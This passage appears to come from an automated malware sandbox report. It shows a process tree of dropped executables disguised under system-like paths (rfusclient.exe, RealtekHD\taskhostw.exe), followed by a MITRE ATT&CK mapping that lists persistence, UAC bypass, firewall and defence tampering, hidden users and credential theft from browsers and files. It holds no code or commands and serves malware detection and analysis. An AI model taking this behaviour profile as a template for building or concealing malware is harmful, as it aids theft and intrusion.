- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:4684
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  - Suspicious use of SendNotifyMessage
  PID:2552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5328

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3332

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery